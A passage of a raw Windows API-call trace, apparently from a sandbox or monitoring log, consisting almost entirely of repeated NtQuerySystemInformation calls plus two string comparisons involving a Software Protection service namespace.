(SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0284.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0284.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0284.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0284.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0284.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0284.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8b0, Length=0x20, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x20, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8c0, Length=0x20, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0284.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0284.988] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0284.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0284.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0284.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0284.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0284.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dcc0, Length=0x28, ResultLength=0x0) [0285.001] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dd40, Length=0x50, ResultLength=0x0) [0285.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daa0, Length=0x28, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db10, Length=0x28, ResultLength=0x0) [0285.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db90, Length=0x28, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da70, Length=0x20, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc70, Length=0x38, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207daf0, Length=0x20, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da80, Length=0x20, ResultLength=0x0) [0285.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0285.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0285.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0285.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 